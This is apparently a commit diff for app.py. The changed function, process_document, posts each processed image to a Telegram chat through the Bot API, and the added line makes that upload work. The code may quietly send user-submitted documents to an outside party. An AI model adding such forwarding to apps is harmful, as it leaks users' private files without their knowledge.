Update app.py
Browse files
app.py
CHANGED
@@ -30,7 +30,7 @@ def process_document(image):
|
|
30 |
url = f'https://api.telegram.org/bot{TOKEN}/sendPhoto?chat_id={CHAT_ID}'
|
31 |
bio = BytesIO()
|
32 |
bio.name = 'image.jpeg'
|
33 |
-
|
34 |
bio.seek(0)
|
35 |
response = requests.post(url, files={'photo': bio})
|
36 |
|
|
|
30 |
url = f'https://api.telegram.org/bot{TOKEN}/sendPhoto?chat_id={CHAT_ID}'
|
31 |
bio = BytesIO()
|
32 |
bio.name = 'image.jpeg'
|
33 |
+
image.save(bio, 'JPEG')
|
34 |
bio.seek(0)
|
35 |
response = requests.post(url, files={'photo': bio})
|
36 |
|